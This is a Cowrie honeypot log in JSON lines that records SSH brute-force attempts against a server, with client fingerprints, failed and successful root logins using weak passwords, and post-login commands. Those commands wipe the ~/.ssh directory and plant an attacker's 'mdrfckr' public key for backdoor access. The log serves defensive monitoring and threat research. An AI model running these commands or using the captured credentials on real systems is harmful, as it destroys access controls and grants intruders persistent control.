{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:26:51.056264Z","src_ip":"216.107.136.92","session":"b41acbd13bd5"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":34472,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0907c2d8430","protocol":"ssh","message":"New connection: 103.206.72.2:34472 (1.2.3.4:22) [session: e0907c2d8430]","sensor":"my-vps","timestamp":"2025-09-08T20:27:51.902540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:27:51.903435Z","src_ip":"103.206.72.2","session":"e0907c2d8430"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:27:52.076761Z","src_ip":"103.206.72.2","session":"e0907c2d8430"}
{"eventid":"cowrie.login.failed","username":"builder","password":"!","message":"login attempt [builder/!] failed","sensor":"my-vps","timestamp":"2025-09-08T20:27:52.808706Z","src_ip":"103.206.72.2","session":"e0907c2d8430"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:27:53.986084Z","src_ip":"103.206.72.2","session":"e0907c2d8430"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":45256,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dc22b490465","protocol":"ssh","message":"New connection: 216.107.136.92:45256 (1.2.3.4:22) [session: 8dc22b490465]","sensor":"my-vps","timestamp":"2025-09-08T20:28:36.603872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:28:36.604809Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:28:36.694877Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.login.success","username":"root","password":"Dev@123","message":"login attempt [root/Dev@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.099073Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:28:37.338076Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.338858Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.340278Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.432219Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:28:37.631207Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.632074Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.724582Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.725523Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":38042,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b9398770c49","protocol":"ssh","message":"New connection: 216.107.136.92:38042 (1.2.3.4:22) [session: 9b9398770c49]","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.814142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.815049Z","src_ip":"216.107.136.92","session":"9b9398770c49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:28:37.905309Z","src_ip":"216.107.136.92","session":"9b9398770c49"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:28:38.310110Z","src_ip":"216.107.136.92","session":"9b9398770c49"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:28:39.406288Z","src_ip":"216.107.136.92","session":"9b9398770c49"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":38046,"dst_ip":"1.2.3.4","dst_port":22,"session":"88efa18c5a0b","protocol":"ssh","message":"New connection: 216.107.136.92:38046 (1.2.3.4:22) [session: 88efa18c5a0b]","sensor":"my-vps","timestamp":"2025-09-08T20:28:39.503888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:28:39.504865Z","src_ip":"216.107.136.92","session":"88efa18c5a0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:28:39.594713Z","src_ip":"216.107.136.92","session":"88efa18c5a0b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:28:39.993767Z","src_ip":"216.107.136.92","session":"88efa18c5a0b"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:28:40.084977Z","src_ip":"216.107.136.92","session":"8dc22b490465"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:28:40.085823Z","src_ip":"216.107.136.92","session":"88efa18c5a0b"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":56072,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcc36b484d5c","protocol":"ssh","message":"New connection: 103.206.72.2:56072 (1.2.3.4:22) [session: bcc36b484d5c]","sensor":"my-vps","timestamp":"2025-09-08T20:29:12.040224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:29:12.042741Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:29:12.219213Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.login.success","username":"root","password":"Lm123456","message":"login attempt [root/Lm123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:29:12.912379Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:29:13.313409Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:29:13.314114Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:29:13.315374Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:29:13.490782Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:29:13.891178Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:29:13.891937Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:29:14.071025Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:29:14.072152Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":56184,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc27a1381cbb","protocol":"ssh","message":"New connection: 103.206.72.2:56184 (1.2.3.4:22) [session: cc27a1381cbb]","sensor":"my-vps","timestamp":"2025-09-08T20:29:14.241153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:29:14.246318Z","src_ip":"103.206.72.2","session":"cc27a1381cbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:29:14.417607Z","src_ip":"103.206.72.2","session":"cc27a1381cbb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:29:15.110027Z","src_ip":"103.206.72.2","session":"cc27a1381cbb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:29:16.287595Z","src_ip":"103.206.72.2","session":"cc27a1381cbb"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":56186,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cbf3b6c474d","protocol":"ssh","message":"New connection: 103.206.72.2:56186 (1.2.3.4:22) [session: 6cbf3b6c474d]","sensor":"my-vps","timestamp":"2025-09-08T20:29:16.458640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:29:16.463937Z","src_ip":"103.206.72.2","session":"6cbf3b6c474d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:29:16.635792Z","src_ip":"103.206.72.2","session":"6cbf3b6c474d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:29:17.331036Z","src_ip":"103.206.72.2","session":"6cbf3b6c474d"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:29:17.510443Z","src_ip":"103.206.72.2","session":"bcc36b484d5c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:29:17.512311Z","src_ip":"103.206.72.2","session":"6cbf3b6c474d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49314,"dst_ip":"1.2.3.4","dst_port":23,"session":"0fa643247826","protocol":"telnet","message":"New connection: 212.227.235.229:49314 (1.2.3.4:23) [session: 0fa643247826]","sensor":"my-vps","timestamp":"2025-09-08T20:29:38.321009Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":49448,"dst_ip":"1.2.3.4","dst_port":22,"session":"af178931353e","protocol":"ssh","message":"New connection: 103.206.72.2:49448 (1.2.3.4:22) [session: af178931353e]","sensor":"my-vps","timestamp":"2025-09-08T20:30:32.082844Z"}
